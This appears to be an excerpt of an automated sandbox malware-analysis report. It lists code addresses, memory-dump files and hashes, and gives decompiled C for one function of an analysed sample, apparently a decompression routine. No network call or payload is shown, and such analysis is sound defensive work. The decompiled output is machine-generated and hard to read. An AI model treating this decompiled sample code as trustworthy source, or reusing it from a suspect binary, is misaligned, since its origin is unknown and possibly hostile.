                                          0x00406c1f
                                          0x00406f91
                                          0x00406f91
                                          0x00406f91
                                          0x00406f94
                                          0x00406f94
                                          0x00406f94
                                          0x00406f9a
                                          0x00406fa0
                                          0x00406fa6
                                          0x00406fc0
                                          0x00406fc3
                                          0x00406fc9
                                          0x00406fd4
                                          0x00406fd6
                                          0x00406fa8
                                          0x00406fa8
                                          0x00406fb7
                                          0x00406fbb
                                          0x00406fbb
                                          0x00406fe0
                                          0x00000000
                                          0x00000000
                                          0x00406fe2
                                          0x00406fe6
                                          0x00407195
                                          0x004071ab
                                          0x004071b3
                                          0x004071ba
                                          0x004071bc
                                          0x004071c3
                                          0x004071c7
                                          0x004071c7
                                          0x00406ff2
                                          0x00406ff9
                                          0x00407001
                                          0x00407004
                                          0x00407007
                                          0x00407007
                                          0x0040700d
                                          0x0040700d
                                          0x004067a9
                                          0x004067a9
                                          0x004067a9
                                          0x004067b2
                                          0x00000000
                                          0x00000000
                                          0x004067b8
                                          0x00000000
                                          0x004067c3
                                          0x00000000
                                          0x00000000
                                          0x004067cc
                                          0x004067cf
                                          0x004067d2
                                          0x004067d6
                                          0x00000000
                                          0x00000000
                                          0x004067dc
                                          0x004067df
                                          0x004067e1
                                          0x004067e2
                                          0x004067e5
                                          0x004067e7
                                          0x004067e8
                                          0x004067ea
                                          0x004067ed
                                          0x004067f2
                                          0x004067f7
                                          0x00406800
                                          0x00406813
                                          0x00406816
                                          0x00406822
                                          0x0040684a
                                          0x0040684c
                                          0x0040685a
                                          0x0040685a
                                          0x0040685e
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040684e
                                          0x0040684e
                                          0x00406851
                                          0x00406852
                                          0x00406852
                                          0x00000000
                                          0x0040684e
                                          0x00406828
                                          0x0040682d
                                          0x0040682d
                                          0x00406836
                                          0x0040683e
                                          0x00406841
                                          0x00000000
                                          0x00406847
                                          0x00406847
                                          0x00000000
                                          0x00406847
                                          0x00000000
                                          0x00406864
                                          0x00406864
                                          0x00406868
                                          0x00407114
                                          0x00000000
                                          0x00407114
                                          0x00406871
                                          0x00406881
                                          0x00406884
                                          0x00406887
                                          0x00406887
                                          0x00406887
                                          0x0040688a
                                          0x0040688e
                                          0x00000000
                                          0x00000000
                                          0x00406890
                                          0x00406896
                                          0x004068c0
                                          0x004068c6
                                          0x004068cd
                                          0x00000000
                                          0x004068cd
                                          0x0040689c
                                          0x0040689f
                                          0x004068a4
                                          0x004068a4
                                          0x004068af
                                          0x004068b7
                                          0x004068ba
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004068ff
                                          0x00406905
                                          0x00406908
                                          0x00406915
                                          0x0040691d
                                          0x00406f91
                                          0x00406f91
                                          0x00000000
                                          0x00000000
                                          0x004068d4
                                          0x004068d4
                                          0x004068d8
                                          0x00407123
                                          0x00000000
                                          0x00407123
                                          0x004068e4
                                          0x004068ef
                                          0x004068ef
                                          0x004068ef
                                          0x004068f2
                                          0x004068f5
                                          0x004068f8
                                          0x004068fd
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406f94
                                          0x00406f94
                                          0x00406f9a
                                          0x00406fa0
                                          0x00406fa6
                                          0x00406fc0
                                          0x00406fc3
                                          0x00406fc9
                                          0x00406fd4
                                          0x00406fd6
                                          0x00406fa8
                                          0x00406fa8
                                          0x00406fb7
                                          0x00406fbb
                                          0x00406fbb
                                          0x00406fe0
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406925
                                          0x00406927
                                          0x0040692a
                                          0x0040699b
                                          0x0040699e
                                          0x004069a1
                                          0x004069a8
                                          0x004069b2
                                          0x00406f91
                                          0x00406f91
                                          0x00406f91
                                          0x00000000
                                          0x00406f91
                                          0x00406f91
                                          0x0040692c
                                          0x00406930
                                          0x00406933
                                          0x00406935
                                          0x00406938
                                          0x0040693b
                                          0x0040693d
                                          0x00406940
                                          0x00406942
                                          0x00406947
                                          0x0040694a
                                          0x0040694d
                                          0x00406951
                                          0x00406958
                                          0x0040695b
                                          0x00406962
                                          0x00406966
                                          0x0040696e
                                          0x0040696e
                                          0x0040696e
                                          0x00406968
                                          0x00406968
                                          0x00406968
                                          0x0040695d
                                          0x0040695d
                                          0x0040695d
                                          0x00406972
                                          0x00406975
                                          0x00406993
                                          0x00406995
                                          0x00000000
                                          0x00406977
                                          0x00406977
                                          0x0040697a
                                          0x0040697d
                                          0x00406980
                                          0x00406982
                                          0x00406982
                                          0x00406982
                                          0x00406985
                                          0x00406988
                                          0x0040698a
                                          0x0040698b
                                          0x0040698e
                                          0x00000000
                                          0x0040698e
                                          0x00000000
                                          0x00406bc4
                                          0x00406bc8
                                          0x00406be6
                                          0x00406be9
                                          0x00406bf0
                                          0x00406bf3
                                          0x00406bf6
                                          0x00406bf9
                                          0x00406bfc
                                          0x00406bff
                                          0x00406c01
                                          0x00406c08
                                          0x00406c09
                                          0x00406c0b
                                          0x00406c0e
                                          0x00406c11
                                          0x00406c14
                                          0x00406c14
                                          0x00406c19
                                          0x00000000
                                          0x00406c19
                                          0x00406bca
                                          0x00406bcd
                                          0x00406bd0
                                          0x00406bda
                                          0x00406f91
                                          0x00406f91
                                          0x00406f91
                                          0x00000000
                                          0x00406f91
                                          0x00000000
                                          0x00406c2e
                                          0x00406c32
                                          0x00406c55
                                          0x00406c58
                                          0x00406c5b
                                          0x00406c65
                                          0x00406c34
                                          0x00406c34
                                          0x00406c37
                                          0x00406c3a
                                          0x00406c3d
                                          0x00406c4a
                                          0x00406c4d
                                          0x00406c4d
                                          0x00406f91
                                          0x00406f91
                                          0x00406f91
                                          0x00000000
                                          0x00406f91
                                          0x00000000
                                          0x00406c71
                                          0x00406c75
                                          0x00000000
                                          0x00000000
                                          0x00406c7b
                                          0x00406c7f
                                          0x00000000
                                          0x00000000
                                          0x00406c85
                                          0x00406c87
                                          0x00406c8b
                                          0x00406c8b
                                          0x00406c8e
                                          0x00406c92
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406d09
                                          0x00406d0d
                                          0x00406d14
                                          0x00406d17
                                          0x00406d1a
                                          0x00406d0f
                                          0x00406d0f
                                          0x00406d0f
                                          0x00406d1d
                                          0x00406d20
                                          0x00000000
                                          0x00000000
                                          0x00406dc9
                                          0x00406dc9
                                          0x00406dcd
                                          0x0040716b
                                          0x00000000
                                          0x0040716b
                                          0x00406dd3
                                          0x00406dd6
                                          0x00406dd9
                                          0x00406ddd
                                          0x00406de0
                                          0x00406de6
                                          0x00406de8
                                          0x00406de8
                                          0x00406de8
                                          0x00406deb
                                          0x00406dee
                                          0x00000000
                                          0x00000000
                                          0x004069be
                                          0x004069be
                                          0x004069c2
                                          0x0040712f
                                          0x00000000
                                          0x0040712f
                                          0x004069c8
                                          0x004069cb
                                          0x004069ce
                                          0x004069d2
                                          0x004069d5
                                          0x004069db
                                          0x004069dd
                                          0x004069dd
                                          0x004069dd
                                          0x004069e0
                                          0x004069e3
                                          0x004069e3
                                          0x004069e6
                                          0x004069e9
                                          0x00000000
                                          0x00000000
                                          0x004069ef
                                          0x004069f5
                                          0x00000000
                                          0x00000000
                                          0x004069fb
                                          0x004069fb
                                          0x004069ff
                                          0x00406a02
                                          0x00406a05
                                          0x00406a08
                                          0x00406a0b
                                          0x00406a0c
                                          0x00406a0f
                                          0x00406a11
                                          0x00406a17
                                          0x00406a1a
                                          0x00406a1d
                                          0x00406a20
                                          0x00406a23
                                          0x00406a26
                                          0x00406a29
                                          0x00406a45
                                          0x00406a48
                                          0x00406a4b
                                          0x00406a4e
                                          0x00406a55
                                          0x00406a59
                                          0x00406a5b
                                          0x00406a5f
                                          0x00406a2b
                                          0x00406a2b
                                          0x00406a2f
                                          0x00406a37
                                          0x00406a3c
                                          0x00406a3e
                                          0x00406a40
                                          0x00406a40
                                          0x00406a62
                                          0x00406a69
                                          0x00406a6c
                                          0x00000000
                                          0x00406a72
                                          0x00000000
                                          0x00406a72
                                          0x00000000
                                          0x00406a77
                                          0x00406a77
                                          0x00406a7b
                                          0x0040713b
                                          0x00000000
                                          0x0040713b
                                          0x00406a81
                                          0x00406a84
                                          0x00406a87
                                          0x00406a8b
                                          0x00406a8e
                                          0x00406a94
                                          0x00406a96
                                          0x00406a96
                                          0x00406a96
                                          0x00406a99
                                          0x00406a9c
                                          0x00406a9c
                                          0x00406a9c
                                          0x00406aa2
                                          0x00000000
                                          0x00000000
                                          0x00406aa4
                                          0x00406aa7
                                          0x00406aaa
                                          0x00406aad
                                          0x00406ab0
                                          0x00406ab3
                                          0x00406ab6
                                          0x00406ab9
                                          0x00406abc
                                          0x00406abf
                                          0x00406ac2
                                          0x00406ada
                                          0x00406add
                                          0x00406ae0
                                          0x00406ae3
                                          0x00406ae3
                                          0x00406ae6
                                          0x00406aea
                                          0x00406aec
                                          0x00406ac4
                                          0x00406ac4
                                          0x00406acc
                                          0x00406ad1
                                          0x00406ad3
                                          0x00406ad5
                                          0x00406ad5
                                          0x00406aef
                                          0x00406af6
                                          0x00406af9
                                          0x00000000
                                          0x00406afb
                                          0x00000000
                                          0x00406afb
                                          0x00406af9
                                          0x00406b00
                                          0x00406b00
                                          0x00406b00
                                          0x00406b00
                                          0x00000000
                                          0x00000000
                                          0x00406b3b
                                          0x00406b3b
                                          0x00406b3f
                                          0x00407147
                                          0x00000000
                                          0x00407147
                                          0x00406b45
                                          0x00406b48
                                          0x00406b4b
                                          0x00406b4f
                                          0x00406b52
                                          0x00406b58
                                          0x00406b5a
                                          0x00406b5a
                                          0x00406b5a
                                          0x00406b5d
                                          0x00406b60
                                          0x00406b60
                                          0x00406b66
                                          0x00406b04
                                          0x00406b04
                                          0x00406b07
                                          0x00000000
                                          0x00406b07
                                          0x00406b68
                                          0x00406b68
                                          0x00406b6b
                                          0x00406b6e
                                          0x00406b71
                                          0x00406b74
                                          0x00406b77
                                          0x00406b7a
                                          0x00406b7d
                                          0x00406b80
                                          0x00406b83
                                          0x00406b86
                                          0x00406b9e
                                          0x00406ba1
                                          0x00406ba4
                                          0x00406ba7
                                          0x00406ba7
                                          0x00406baa
                                          0x00406bae
                                          0x00406bb0
                                          0x00406b88
                                          0x00406b88
                                          0x00406b90
                                          0x00406b95
                                          0x00406b97
                                          0x00406b99
                                          0x00406b99
                                          0x00406bb3
                                          0x00406bba
                                          0x00406bbd
                                          0x00000000
                                          0x00406bbf
                                          0x00000000
                                          0x00406bbf
                                          0x00000000
                                          0x00406e4c
                                          0x00406e4c
                                          0x00406e50
                                          0x00407177
                                          0x00000000
                                          0x00407177
                                          0x00406e56
                                          0x00406e59
                                          0x00406e5c
                                          0x00406e60
                                          0x00406e63
                                          0x00406e69
                                          0x00406e6b
                                          0x00406e6b
                                          0x00406e6b
                                          0x00406e6e
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406f5b
                                          0x00406f5f
                                          0x00406f81
                                          0x00406f84
                                          0x00406f8e
                                          0x00406f91
                                          0x00406f91
                                          0x00406f91
                                          0x00000000
                                          0x00406f91
                                          0x00406f91
                                          0x00406f61
                                          0x00406f64
                                          0x00406f68
                                          0x00406f6b
                                          0x00406f6b
                                          0x00406f6e
                                          0x00000000
                                          0x00000000
                                          0x00407018
                                          0x0040701c
                                          0x0040703a
                                          0x0040703a
                                          0x0040703a
                                          0x00407041
                                          0x00407048
                                          0x0040704f
                                          0x0040704f
                                          0x00000000
                                          0x0040704f
                                          0x0040701e
                                          0x00407021
                                          0x00407024
                                          0x00407027
                                          0x0040702e
                                          0x00406f72
                                          0x00406f72
                                          0x00406f75
                                          0x00000000
                                          0x00000000
                                          0x00407109
                                          0x0040710c
                                          0x0040700d
                                          0x00000000
                                          0x00000000
                                          0x00406d43
                                          0x00406d45
                                          0x00406d4c
                                          0x00406d4d
                                          0x00406d4f
                                          0x00406d52
                                          0x00000000
                                          0x00000000
                                          0x00406d5a
                                          0x00406d5d
                                          0x00406d60
                                          0x00406d62
                                          0x00406d64
                                          0x00406d64
                                          0x00406d65
                                          0x00406d68
                                          0x00406d6f
                                          0x00406d72
                                          0x00406d80
                                          0x00000000
                                          0x00000000
                                          0x00407056
                                          0x00407056
                                          0x00407059
                                          0x00407060
                                          0x00000000
                                          0x00000000
                                          0x00407065
                                          0x00407065
                                          0x00407069
                                          0x004071a1
                                          0x00000000
                                          0x004071a1
                                          0x0040706f
                                          0x00407072
                                          0x00407075
                                          0x00407079
                                          0x0040707c
                                          0x00407082
                                          0x00407084
                                          0x00407084
                                          0x00407084
                                          0x00407087
                                          0x0040708a
                                          0x0040708a
                                          0x0040708a
                                          0x0040708a
                                          0x0040708d
                                          0x0040708d
                                          0x00407091
                                          0x004070f1
                                          0x004070f4
                                          0x004070f9
                                          0x004070fa
                                          0x004070fc
                                          0x004070fe
                                          0x00407101
                                          0x0040700d
                                          0x0040700d
                                          0x00000000
                                          0x00407013
                                          0x0040700d
                                          0x00407093
                                          0x00407099
                                          0x0040709c
                                          0x0040709f
                                          0x004070a2
                                          0x004070a5
                                          0x004070a8
                                          0x004070ab
                                          0x004070ae
                                          0x004070b1
                                          0x004070b4
                                          0x004070cd
                                          0x004070d0
                                          0x004070d3
                                          0x004070d6
                                          0x004070da
                                          0x004070dc
                                          0x004070dc
                                          0x004070dd
                                          0x004070e0
                                          0x004070b6
                                          0x004070b6
                                          0x004070be
                                          0x004070c3
                                          0x004070c5
                                          0x004070c8
                                          0x004070c8
                                          0x004070e3
                                          0x004070ea
                                          0x00000000
                                          0x004070ec
                                          0x00000000
                                          0x004070ec
                                          0x00000000
                                          0x00406d88
                                          0x00406d8b
                                          0x00406dc1
                                          0x00406ef1
                                          0x00406ef1
                                          0x00406ef1
                                          0x00406ef1
                                          0x00406ef4
                                          0x00406ef4
                                          0x00406ef7
                                          0x00406ef9
                                          0x00407183
                                          0x00000000
                                          0x00407183
                                          0x00406eff
                                          0x00406f02
                                          0x00000000
                                          0x00000000
                                          0x00406f08
                                          0x00406f0c
                                          0x00406f0f
                                          0x00406f0f
                                          0x00406f0f
                                          0x00000000
                                          0x00406f0f
                                          0x00406d8d
                                          0x00406d8f
                                          0x00406d91
                                          0x00406d93
                                          0x00406d96
                                          0x00406d97
                                          0x00406d99
                                          0x00406d9b
                                          0x00406d9e
                                          0x00406da1
                                          0x00406db7
                                          0x00406dbc
                                          0x00406df4
                                          0x00406df4
                                          0x00406df8
                                          0x00406e24
                                          0x00406e26
                                          0x00406e2d
                                          0x00406e30
                                          0x00406e33
                                          0x00406e33
                                          0x00406e38
                                          0x00406e38
                                          0x00406e3a
                                          0x00406e3d
                                          0x00406e44
                                          0x00406e47
                                          0x00406e74
                                          0x00406e74
                                          0x00406e77
                                          0x00406e7a
                                          0x00406eee
                                          0x00406eee
                                          0x00406eee
                                          0x00000000
                                          0x00406eee
                                          0x00406e7c
                                          0x00406e82
                                          0x00406e85
                                          0x00406e88
                                          0x00406e8b
                                          0x00406e8e
                                          0x00406e91
                                          0x00406e94
                                          0x00406e97
                                          0x00406e9a
                                          0x00406e9d
                                          0x00406eb6
                                          0x00406eb8
                                          0x00406ebb
                                          0x00406ebc
                                          0x00406ebf
                                          0x00406ec1
                                          0x00406ec4
                                          0x00406ec6
                                          0x00406ec8
                                          0x00406ecb
                                          0x00406ecd
                                          0x00406ed0
                                          0x00406ed4
                                          0x00406ed6
                                          0x00406ed6
                                          0x00406ed7
                                          0x00406eda
                                          0x00406edd
                                          0x00406e9f
                                          0x00406e9f
                                          0x00406ea7
                                          0x00406eac
                                          0x00406eae
                                          0x00406eb1
                                          0x00406eb1
                                          0x00406ee0
                                          0x00406ee7
                                          0x00406e71
                                          0x00406e71
                                          0x00406e71
                                          0x00406e71
                                          0x00000000
                                          0x00406ee9
                                          0x00000000
                                          0x00406ee9
                                          0x00406ee7
                                          0x00406dfa
                                          0x00406dfd
                                          0x00406dff
                                          0x00406e02
                                          0x00406e05
                                          0x00406e08
                                          0x00406e0a
                                          0x00406e0d
                                          0x00406e10
                                          0x00406e10
                                          0x00406e13
                                          0x00406e13
                                          0x00406e16
                                          0x00406e1d
                                          0x00406df1
                                          0x00406df1
                                          0x00406df1
                                          0x00406df1
                                          0x00000000
                                          0x00406e1f
                                          0x00000000
                                          0x00406e1f
                                          0x00406e1d
                                          0x00406da3
                                          0x00406da6
                                          0x00406da8
                                          0x00406dab
                                          0x00000000
                                          0x00000000
                                          0x00406b0a
                                          0x00406b0a
                                          0x00406b0e
                                          0x00407153
                                          0x00000000
                                          0x00407153
                                          0x00406b14
                                          0x00406b17
                                          0x00406b1a
                                          0x00406b1d
                                          0x00406b20
                                          0x00406b23
                                          0x00406b26
                                          0x00406b28
                                          0x00406b2b
                                          0x00406b2e
                                          0x00406b31
                                          0x00406b33
                                          0x00406b33
                                          0x00406b33
                                          0x00000000
                                          0x00000000
                                          0x00406c95
                                          0x00406c95
                                          0x00406c99
                                          0x0040715f
                                          0x00000000
                                          0x0040715f
                                          0x00406c9f
                                          0x00406ca2
                                          0x00406ca5
                                          0x00406ca8
                                          0x00406caa
                                          0x00406caa
                                          0x00406caa
                                          0x00406cad
                                          0x00406cb0
                                          0x00406cb3
                                          0x00406cb6
                                          0x00406cb9
                                          0x00406cbc
                                          0x00406cbd
                                          0x00406cbf
                                          0x00406cbf
                                          0x00406cbf
                                          0x00406cc2
                                          0x00406cc5
                                          0x00406cc8
                                          0x00406ccb
                                          0x00406ccb
                                          0x00406ccb
                                          0x00406cce
                                          0x00406cd0
                                          0x00406cd0
                                          0x00000000
                                          0x00000000
                                          0x00406f12
                                          0x00406f12
                                          0x00406f12
                                          0x00406f16
                                          0x00000000
                                          0x00000000
                                          0x00406f1c
                                          0x00406f1f
                                          0x00406f22
                                          0x00406f25
                                          0x00406f27
                                          0x00406f27
                                          0x00406f27
                                          0x00406f2a
                                          0x00406f2d
                                          0x00406f30
                                          0x00406f33
                                          0x00406f36
                                          0x00406f39
                                          0x00406f3a
                                          0x00406f3c
                                          0x00406f3c
                                          0x00406f3c
                                          0x00406f3f
                                          0x00406f42
                                          0x00406f45
                                          0x00406f48
                                          0x00406f4b
                                          0x00406f4f
                                          0x00406f51
                                          0x00406f54
                                          0x00000000
                                          0x00406f56
                                          0x00406cd3
                                          0x00406cd3
                                          0x00000000
                                          0x00406cd3
                                          0x00406f54
                                          0x00407189
                                          0x00000000
                                          0x00000000
                                          0x004067b8
                                          0x004071c0
                                          0x004071c0
                                          0x00000000
                                          0x004071c0
                                          0x0040700d
                                          0x00406f94
                                          0x00406f91
                                          0x00000000
                                          0x00406ce6

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1e7a7db026ec9aad88acaa11386c02789d7bc6b83e00ba9479abd6ecc9ecffba
                                          • Instruction ID: a9aff89c954bf491ffe4c30e494efe667c8bfb024e4a61e14b5544386b4e6ab4
                                          • Opcode Fuzzy Hash: 1e7a7db026ec9aad88acaa11386c02789d7bc6b83e00ba9479abd6ecc9ecffba
                                          • Instruction Fuzzy Hash: 47713471D04229CBDF28CF98C844BADBBB1FF48305F15806AD856BB281C7786996DF45
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00406C2E, Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 98%
                                          			E00406C2E() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004071C8))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
